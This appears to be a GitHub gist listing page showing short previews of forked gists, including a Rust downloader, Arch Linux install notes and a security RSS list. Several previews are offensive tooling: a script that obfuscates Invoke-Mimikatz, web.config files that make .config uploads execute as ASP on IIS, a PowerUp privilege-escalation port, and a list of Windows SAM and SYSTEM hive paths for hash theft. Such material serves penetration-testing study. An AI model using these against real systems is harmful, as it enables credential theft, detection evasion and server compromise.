prachauthit’s gists

prachauthit / main.rs

Created June 25, 2020 13:54 — forked from patshaughnessy/main.rs

	// Code from: http://patshaughnessy.net/2020/1/20/downloading-100000-files-using-async-rust
	//
	// Cargo.toml:
	// [dependencies]
	// tokio = { version = "0.2", features = ["full"] }
	// reqwest = { version = "0.10", features = ["json"] }
	// futures = "0.3"

	use std::io::prelude::*;
	use std::fs::File;

prachauthit / dell-XPS-15-arch-linux-install

Last active March 17, 2020 09:38 — forked from marc-fez/dell-XPS-15-arch-linux-install

Instructions for installing arch linux on a Dell XPS 15 with full system encryption using dm-crypt and luks

	# Having problems with the nvidia drivers
	# Arch wiki page on XPS 15
	# https://wiki.archlinux.org/index.php/Dell_XPS_15_9560

	# Install ARCH Linux with encrypted file-system and UEFI on Dell XPS 15
	# The official installation guide (https://wiki.archlinux.org/index.php/Installation_Guide) contains a more verbose description.

	# Download the archiso image from https://www.archlinux.org/
	# Copy to a usb-drive
	dd if=archlinux.img of=/dev/sdX bs=16M && sync # on linux

prachauthit / feedly.opml

Created February 10, 2020 11:28 — forked from breakersall/feedly.opml

Feedly Security Feed

	<?xml version="1.0" encoding="UTF-8"?>

	<opml version="1.0">
	<head>
	<title>Matt subscriptions in feedly Cloud</title>
	</head>
	<body>
	<outline text="RedTeaming" title="RedTeaming">
	<outline type="rss" text="Strategic Cyber LLC" title="Strategic Cyber LLC" xmlUrl="http://blog.strategiccyber.com/feed/" htmlUrl="https://blog.cobaltstrike.com"/>
	<outline type="rss" text="Silent Break Security" title="Silent Break Security" xmlUrl="http://silentbreaksecurity.com/feed/" htmlUrl="https://silentbreaksecurity.com"/>

prachauthit / feedly.opml

Created February 10, 2020 11:28 — forked from breakersall/feedly.opml

Feedly Security Feed

	<?xml version="1.0" encoding="UTF-8"?>

	<opml version="1.0">
	<head>
	<title>Matt subscriptions in feedly Cloud</title>
	</head>
	<body>
	<outline text="RedTeaming" title="RedTeaming">
	<outline type="rss" text="Strategic Cyber LLC" title="Strategic Cyber LLC" xmlUrl="http://blog.strategiccyber.com/feed/" htmlUrl="https://blog.cobaltstrike.com"/>
	<outline type="rss" text="Silent Break Security" title="Silent Break Security" xmlUrl="http://silentbreaksecurity.com/feed/" htmlUrl="https://silentbreaksecurity.com"/>

prachauthit / obfuscate-mimikatz.sh

Last active October 22, 2019 12:27 — forked from infosecn1nja/obfuscate-mimikatz.sh

	#!/bin/bash
	#https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1
	if [[ $# -le 1 ]] ; then
	echo './obfuscate-mimikatz.sh Invoke-Mimikatz.ps1 newfile.ps1'
	exit 1
	fi

	randstr(){< /dev/urandom tr -dc a-zA-Z0-9 \| head -c${1:-8};}

	cp $1 $2

prachauthit / # Official Windows VM download URL archive.md

Created September 12, 2019 13:08 — forked from zmwangx/# Official Windows VM download URL archive.md

Official Windows VM download URL archive, from https://dev.modern.ie/tools/vms/mac/ — scratch that — https://developer.microsoft.com/en-us/microsoft-edge/api/tools/vms/

prachauthit / web.config

Created August 9, 2019 15:27 — forked from Ge0rg3/web.config

	<?xml version="1.0" encoding="UTF-8"?>
	<configuration>
	<system.webServer>
	<handlers accessPolicy="Read, Script, Write">
	<add name="web_config" path=".config" verb="" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
	</handlers>
	<security>
	<requestFiltering>
	<fileExtensions>
	<remove fileExtension=".config" />

prachauthit / web.config

Created August 9, 2019 15:22 — forked from 003random/web.config

	<?xml version="1.0" encoding="UTF-8"?>
	<configuration>
	<system.webServer>
	<handlers accessPolicy="Read, Script, Write">
	<add name="web_config" path=".config" verb="" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
	</handlers>
	<security>
	<requestFiltering>
	<fileExtensions>
	<remove fileExtension=".config" />

prachauthit / invokeAllChecks.vbs

Created July 3, 2017 08:55 — forked from ImAnEnabler/invokeAllChecks.vbs

VBscript implementation of the Invoke-AllChecks function of PowerUp using WMI


	'-'
	'-' invokeAllChecks.vbs
	'-'
	'-' VBscript implementation of the Invoke-AllChecks function of PowerUp developed by @harmj0y
	'-' by: @ImAnEnabler
	'-'
	'-' In the environment I work, sc.exe is not allowed for non-admins, so I used WMI instead.
	'-' Save the vbs file and run with cscript:
	'-' cscript //nologo invokeAllChecks.vbs

prachauthit / windows_blind

Created July 3, 2017 08:54 — forked from sckalath/windows_blind

Windows Blind Files

	%SYSTEMDRIVE%\boot.ini
	%WINDIR%\win.ini This is another file that can be counted on to be readable by all users of a system.
	%SYSTEMROOT%\repair\SAM
	%SYSTEMROOT%\System32\config\RegBack\SAM Stores user passwords in either an LM hash and/or an NTLM hash format. The SAM file in \repair is locked, but can be retrieved using forensic or Volume Shadow copy methods.
	%SYSTEMROOT%\repair\system
	%SYSTEMROOT%\System32\config\RegBack\system This is the SYSTEM registry hive. This file is needed to extract the user account password hashes from a Windows system. The SYSTEM file in \repair is locked, but can be retrieved using forensic or Volume Shadow copy methods.
	%SYSTEMROOT%\repair\SAM
	%SYSTEMROOT%\System32\config\RegBack\SAM These files store the LM and NTLM hashes for local users. Using Volume Shadow Copy or Ninja Copy you can retrieve these files.
	%WINDIR%\repair\sam
	%WINDIR%\repair\system